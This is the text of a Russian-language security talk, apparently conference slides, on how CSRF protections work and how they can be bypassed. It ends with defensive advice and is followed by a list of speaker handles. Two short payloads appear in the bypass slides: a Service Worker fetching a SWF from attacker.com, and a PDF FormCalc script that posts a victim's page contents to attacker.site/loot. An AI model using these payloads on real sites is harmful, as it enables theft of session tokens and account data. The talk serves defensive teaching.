Почему CSRF-атаки работают? Веб-приложение использует cookies для управления сессией пользователя! Браузер автоматически отправляет cookies вместе с HTTP-запросом, даже cross-origin
Cookies Небольшой фрагмент данных, отправленный веб-сервером и хранимый на компьютере пользователя, браузер всякий раз пересылает этот фрагмент данных веб-серверу в составе HTTP- запроса Сервер Клиент Set-Cookie: name=value; expires=date; path=/; domain=.example.org; secure; httponly; Cookie: name=newvalue;
История CSRF-атак Эксплуатируются с 2001 года Публичные CSRF-уязвимости в популярных проектах 2008-2012: 1. YouTube 2. The New York Times 3. Badoo 4. Slideshare 5. Vimeo 6. Hulu 7. КиноПоиск 8. …
Популярные варианты защиты от CSRF CSRF token Double submit cookie Content-Type based protection Referer-based protection Password confirmation (websudo) SameSite Cookies (Chrome, Opera) You shall not pass!!! You shall not PASS!!!
Популярные варианты защиты от CSRF CSRF token (1 из 6) Уникальный и высокоэнтропийный токен для каждой пользовательской сессии Токен вставляется в DOM или доступен через API Пользователь должен отправить токен в параметре или хэдере запроса Атакующий не знает токен → классическая CSRF-атака не работает
Популярные варианты защиты от CSRF Double submit cookie (2 из 6) Уникальный и высокоэнтропийный токен для каждой пользовательской сессии помещается в cookies Пользователь должен отправить одинаковые значения в cookies и в параметре запроса Атакующий не может изменить cookies → классическая CSRF- атака не работает
Популярные варианты защиты от CSRF Content-Type based protection (3 из 6) Пользователь должен отправить запрос с определенным заголовком Content-Type, например application/json Браузер через форму или XHR не может отправить произвольный Content-Type cross-origin → классическая CSRF- атака не работает
Популярные варианты защиты от CSRF Referer-based protection (4 из 6) Пользователь должен отправить запрос с определенным заголовком Referer Браузер не может отправить произвольный Referer через форму или XHR → классическая CSRF-атака не работает
Популярные варианты защиты от CSRF Password confirmation / websudo (5 из 6) Действие либо доступ к критичному функционалу подтверждается вводом пароля (секрета) Атакующий не знает пароля → классическая CSRF-атака не работает
Популярные варианты защиты от CSRF SameSite Cookies в Chrome, Opera (6 из 6) Дополнительный атрибут у cookies – samesite (значения lax и strict) Браузер не отправляет cookies, если запрос осуществляется с сайта атакующего → классическая CSRF-атака не работает
Когда есть HTML injection, но нет XSS (например, есть Content Security Policy - CSP) Атакующий может заполучить CSRF-токен через Dangling markup injection Сценарий обхода – Dangling markup (2 из 8)
Сценарий обхода – уязвимый субдомен (3 из 8) Один из поддоменов foo.example.com уязвим к subdomain takeover или XSS Атакующий сможет обойти следующие типы CSRF-защиты: CSRF tokens Double submit cookie Content-Type based protection
Приложение использует CORS (Cross-Origin Resource Sharing) для междоменного взаимодействия Атакующий сможет прочитать CSRF-токен Access-Control-Allow-Origin: https://foo.example.com Access-Control-Allow-Credentials: true Сценарий обхода – уязвимый субдомен (3 из 8)
На основном домене есть crossdomain.xml который разрешает взаимодействие для субдоменов Атакующий может загрузить файл с JS на foo.example.com Пример - https://ahussam.me/Amazon-leaking-csrf-token-using-service-worker/
Атакующий может использовать Service Worker для субдомена foo.example.com Через SWF атакующий сможет прочитать CSRF-токен! var url = "https://attacker.com/bad.swf"; onfetch = (e) => { e.respondWith(fetch(url); } Сценарий обхода – уязвимый субдомен (3 из 8)
Атакующий сможет установить cookie для родительского домена на интересующий path Браузер выберет cookie с самым длинным path Тем самым атакующий сможет обойти защиту Double submit cookie Сценарий обхода – уязвимый субдомен (3 из 8)
Сценарий обхода – bad PDF (4 из 8) PDF plugin от Adobe поддерживает FormCalc PDF plugin от Adobe работает в IE11 и Firefox ESR В FormCalc есть методы get() и post() Атакующий получает CSRF-токен жертвы
Сценарий обхода – bad PDF (4 из 8) Допустим, у нас есть возможность загрузить PDF в веб- приложение (можно загрузить PDF как файл другого формата – картинкy ) У приложения есть API на интересующем домене, которое позволяет получать содержимое загруженного PDF
Сценарий обхода – bad PDF (4 из 8) <br/>var content = GET("https://example.com/Settings.action");<br/>Post("http://attacker.site/loot",content,"text/plain");<br/> leak.pdf
Сценарий обхода – cookie injection (5 из 8) Атакующий в результате сookie injection сможет обойти защиту Double submit cookie Варианты cookie injection CRLF injection Особенности обработки cookie браузером – comma-separated cookies (Safari) Баги браузера (например, CVE-2016-9078 в FF)
Сценарий обхода – non-simple Content-Type (7 из 8) Валидные значения content type, которые можно отправить из HTML-формы и через XHR без OPTIONS preflight - aka simple content types text/plain application/x-www-form-urlencoded multipart/form-data
Баг в Chrome - https://bugs.chromium.org/p/chromium/issues/detail?id=490015 Можно было эксплуатировать с 2015 по 07.2017 Navigator.sendBeacon() позволял отправить POST-запрос с любым Content-Type на другой origin Сценарий обхода – non-simple Content-Type (7 из 8)
Сценарий обхода – spoof Referer (8 из 8) Баг в Edge - https://www.brokenbrowser.com/referer-spoofing-patch-bypass/ Еще работает Ho работает только для GET-запросов
Сценарий обхода – spoof Referer (8 из 8) В бэкенд будет отправлен header Некоторые серверы воспринимают пробел как конец имени HTTP-заголовка (например, WildFly или Jboss) – т.е. двоеточие `:` Referer http://example.com Имя :Значение Referer http://example.com Имя :Значение
Обход CSRF-защиты – Итог CSRF Tokens Double Submit Cookie CT-based Referer-based SameSite Cookies XSS All All All All All Dangling markup All - - - All* Subdomain issues All All All - All* Cookie Injection - All - - All* Change CT - - All - All* Non-simple CT - - All with Flash plugin, IE11/FF ESR with Pdf plugin - All* Bad Pdf IE11/FF ESR with Pdf plugin - IE11/FF ESR with Pdf plugin - All* Spoof Referer - - - IE11/FF ESR with Pdf plugin, Edge All* All – works for all browsers All* – All browsers except browsers that support SameSite Cookies (Chrome & Opera)
Как все-таки правильно защититься от CSRF … eсли не можете отказаться от cookies Моделируйте угрозы и проверяйте реализацию (см. Итоговую таблицу) Имплементируйте SameSite Cookies Комбинируйте различные CSRF-защиты – defense in depth Спрашивайте у пользователя пароль для выполнения критичных action’ов Отдавайте загружаемые файлы с отдельного домена
0ang3el
munetoshi
77web
kdubois
pangmoo
pocke
ivargrimstad
honma12345
yui_knk
takuyay0ne
yusukebe
dalinaum
manfredsteyer
62gerente
quramy
colly
jrom
myddelton
zenorocha
morganepeng
tenderlove
jennybc
brettharned
jponch
trallard